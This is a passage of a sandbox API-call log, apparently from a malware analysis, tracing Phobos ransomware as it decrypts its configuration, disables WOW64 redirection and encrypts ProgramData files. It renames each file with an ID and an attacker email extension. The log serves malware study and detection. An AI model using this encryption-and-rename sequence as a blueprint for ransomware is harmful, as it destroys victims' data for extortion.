dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3c6fd60 | out: phKey=0x3c6fd60*=0x29c060) returned 1 [0124.833] CryptSetKeyParam (hKey=0x29c060, dwParam=0x1, pbData=0x3c6fd48, dwFlags=0x0) returned 1 [0124.833] CryptDecrypt (in: hKey=0x29c060, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db1470, pdwDataLen=0x3c6fd14 | out: pbData=0x1db1470, pdwDataLen=0x3c6fd14) returned 1 [0124.833] CryptDestroyKey (hKey=0x29c060) returned 1 [0124.833] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76180000 [0124.833] GetProcAddress (hModule=0x76180000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x761ad668 [0124.833] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0124.833] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1470 | out: hHeap=0x1db0000) returned 1 [0124.833] SetEvent (hEvent=0x278) returned 1 [0124.833] SetEvent (hEvent=0x274) returned 1 [0124.833] SetEvent (hEvent=0x27c) returned 1 [0124.833] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x42b0020 | out: hHeap=0x1db0000) returned 1 [0124.839] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5900 | out: hHeap=0x1db0000) returned 1 [0124.839] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30dbf30 | out: hHeap=0x1db0000) returned 1 [0124.840] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fb0058 | out: hHeap=0x1db0000) returned 1 Thread: id = 105 os_tid = 0x7b0 [0112.517] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3fc0060 [0112.517] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x10000) returned 0x3fd0068 [0112.518] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x28) returned 0x1db9a90 [0112.518] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x110102) returned 0x43d0020 [0112.518] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x50) returned 0x1db9ac0 [0112.518] CryptImportKey (in: hProv=0x254d70, pbData=0x3dcf948, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3dcf9b0 | out: phKey=0x3dcf9b0*=0x29c1a0) returned 1 [0112.518] CryptSetKeyParam (hKey=0x29c1a0, dwParam=0x1, pbData=0x3dcf998, dwFlags=0x0) returned 1 [0112.518] CryptDecrypt (in: hKey=0x29c1a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db9ac0, pdwDataLen=0x3dcf964 | out: pbData=0x1db9ac0, pdwDataLen=0x3dcf964) returned 1 [0112.518] CryptDestroyKey (hKey=0x29c1a0) returned 1 [0112.518] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76180000 [0112.518] GetProcAddress (hModule=0x76180000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x761ad650 [0112.518] Wow64DisableWow64FsRedirection (in: OldValue=0x3dcf9fc | out: OldValue=0x3dcf9fc*=0x0) returned 1 [0112.518] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db9ac0 | out: hHeap=0x1db0000) returned 1 [0112.518] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0112.519] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0112.535] GetFileSizeEx (in: hFile=0x2bc, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=17707008) returned 1 [0112.535] CloseHandle (hObject=0x2bc) returned 1 [0112.535] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp")) returned 0x20 [0112.535] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0112.536] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0112.536] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3dcf910 | out: lpNewFilePointer=0x0) returned 1 [0112.536] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3dcf910 | out: lpNewFilePointer=0x0) returned 1 [0112.536] ReadFile (in: hFile=0x2bc, lpBuffer=0x43d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3dcf91c, lpOverlapped=0x0 | out: lpBuffer=0x43d0058*, lpNumberOfBytesRead=0x3dcf91c*=0x40000, lpOverlapped=0x0) returned 1 [0112.648] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x5a1000, lpNewFilePointer=0x0, dwMoveMethod=0x3dcf910 | out: lpNewFilePointer=0x0) returned 1 [0112.648] ReadFile (in: hFile=0x2bc, lpBuffer=0x4410058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3dcf91c, lpOverlapped=0x0 | out: lpBuffer=0x4410058*, lpNumberOfBytesRead=0x3dcf91c*=0x40000, lpOverlapped=0x0) returned 1 [0112.719] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x10a3000, lpNewFilePointer=0x0, dwMoveMethod=0x3dcf910 | out: lpNewFilePointer=0x0) returned 1 [0112.719] ReadFile (in: hFile=0x2bc, lpBuffer=0x4450058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3dcf91c, lpOverlapped=0x0 | out: lpBuffer=0x4450058*, lpNumberOfBytesRead=0x3dcf91c*=0x40000, lpOverlapped=0x0) returned 1 [0112.842] CryptImportKey (in: hProv=0x254d70, pbData=0x3dcf900, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3dcf96c | out: phKey=0x3dcf96c*=0x29c220) returned 1 [0112.842] CryptSetKeyParam (hKey=0x29c220, dwParam=0x1, pbData=0x3dcfa00, dwFlags=0x0) returned 1 [0113.143] CryptEncrypt (in: hKey=0x29c220, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x43d0020*, pdwDataLen=0x3dcf920*=0xc0070, dwBufLen=0xc0070 | out: pbData=0x43d0020*, pdwDataLen=0x3dcf920*=0xc0070) returned 1 [0113.291] CryptDestroyKey (hKey=0x29c220) returned 1 [0113.291] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3dcf948 | out: lpNewFilePointer=0x0) returned 1 [0113.291] WriteFile (in: hFile=0x2bc, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0xc0122, lpNumberOfBytesWritten=0x3dcf958, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3dcf958*=0xc0122, lpOverlapped=0x0) returned 1 [0113.366] SetEndOfFile (hFile=0x2bc) returned 1 [0113.369] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x10a3000, lpNewFilePointer=0x0, dwMoveMethod=0x3dcf918 | out: lpNewFilePointer=0x0) returned 1 [0113.369] WriteFile (in: hFile=0x2bc, lpBuffer=0x449015a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3dcf924, lpOverlapped=0x0 | out: lpBuffer=0x449015a*, lpNumberOfBytesWritten=0x3dcf924*=0x40000, lpOverlapped=0x0) returned 1 [0113.371] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x5a1000, lpNewFilePointer=0x0, dwMoveMethod=0x3dcf918 | out: lpNewFilePointer=0x0) returned 1 [0113.371] WriteFile (in: hFile=0x2bc, lpBuffer=0x449015a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3dcf924, lpOverlapped=0x0 | out: lpBuffer=0x449015a*, lpNumberOfBytesWritten=0x3dcf924*=0x40000, lpOverlapped=0x0) returned 1 [0113.371] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3dcf918 | out: lpNewFilePointer=0x0) returned 1 [0113.371] WriteFile (in: hFile=0x2bc, lpBuffer=0x449015a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3dcf924, lpOverlapped=0x0 | out: lpBuffer=0x449015a*, lpNumberOfBytesWritten=0x3dcf924*=0x40000, lpOverlapped=0x0) returned 1 [0113.372] CloseHandle (hObject=0x2bc) returned 1 [0119.958] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0119.958] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0121.207] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=12066) returned 1 [0121.207] CloseHandle (hObject=0x2b8) returned 1 [0121.207] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d")) returned 0x2026 [0121.207] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0121.208] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0121.208] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0121.208] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0121.208] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=222716) returned 1 [0121.208] CloseHandle (hObject=0x2b8) returned 1 [0121.208] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w")) returned 0x2026 [0121.208] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0121.208] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0121.208] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0121.208] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0121.245] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=206316) returned 1 [0121.245] CloseHandle (hObject=0x2b8) returned 1 [0121.245] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w")) returned 0x2026 [0121.245] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0121.245] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0121.246] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0121.246] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0121.246] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=499482) returned 1 [0121.246] CloseHandle (hObject=0x2b8) returned 1 [0121.246] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h")) returned 0x2026 [0121.246] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0121.246] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0121.246] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0121.246] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0121.252] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=14660) returned 1 [0121.252] CloseHandle (hObject=0x2ac) returned 1 [0121.252] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d")) returned 0x2026 [0121.252] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0121.252] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0121.252] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0121.252] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0121.252] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=4) returned 1 [0121.252] CloseHandle (hObject=0x2ac) returned 1 [0121.252] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck")) returned 0x2026 [0121.252] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0121.252] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0121.253] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0121.253] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0121.253] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=873232) returned 1 [0121.253] CloseHandle (hObject=0x2ac) returned 1 [0121.253] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q")) returned 0x2026 [0121.253] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0121.253] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0121.253] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0121.253] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0121.254] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=53411) returned 1 [0121.254] CloseHandle (hObject=0x2ac) returned 1 [0121.254] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico")) returned 0x20 [0121.254] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0121.254] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0121.254] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0121.255] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0121.257] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=29422) returned 1 [0121.257] CloseHandle (hObject=0x2ac) returned 1 [0121.257] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico")) returned 0x20 [0121.257] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0121.257] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0121.257] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0121.257] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0121.257] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=83560) returned 1 [0121.257] CloseHandle (hObject=0x2ac) returned 1 [0121.258] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico")) returned 0x20 [0121.258] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: 